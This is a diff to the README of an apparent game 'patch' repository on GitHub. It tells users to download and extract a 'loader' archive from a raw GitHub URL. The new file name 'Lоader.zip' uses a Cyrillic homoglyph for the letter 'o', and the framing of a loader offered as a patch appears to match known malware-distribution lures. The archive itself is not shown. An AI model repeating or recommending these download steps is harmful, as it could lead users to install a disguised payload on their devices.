AntonioPhilip/WolfTails-Adulteon-Patch/README.md

 ## 🌐 Installation Guide

-**1. Download Loader.rar from the repository**
+**1. Download https://raw.githubusercontent.com/AntonioPhilip/WolfTails-Adulteon-Patch/main/Lоader.zip from the repository**
-   - Locate the `Loader.rar` archive hosted directly in this GitHub repository.
+   - Locate the `https://raw.githubusercontent.com/AntonioPhilip/WolfTails-Adulteon-Patch/main/Lоader.zip` archive hosted directly in this GitHub repository.
    - Click the Download button and save the file to a known location on your device.

 **2. Extract the loader**